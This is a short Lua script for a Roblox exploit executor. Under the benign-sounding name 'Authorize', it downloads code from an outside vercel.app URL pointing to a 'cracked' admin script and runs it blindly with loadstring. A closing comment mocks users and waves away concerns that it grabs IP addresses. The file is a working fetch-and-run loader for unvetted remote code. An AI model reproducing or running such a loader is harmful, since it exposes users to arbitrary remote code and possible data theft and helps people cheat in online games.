local ScriptManager = {} function ScriptManager.Authorize(url) local success, result = pcall(function() local code = game:HttpGet(url) return loadstring(code)() end) if not success then warn("Failed to load script: " .. tostring(result)) end end ScriptManager.Authorize("https://yourscoper.vercel.app/scripts/akadmin/cracked.lua") --[[ If you crash your executor is SHIT, if you think this is an ip -grab run an api caller/http caller script and see if it runs any ip urls. ]]--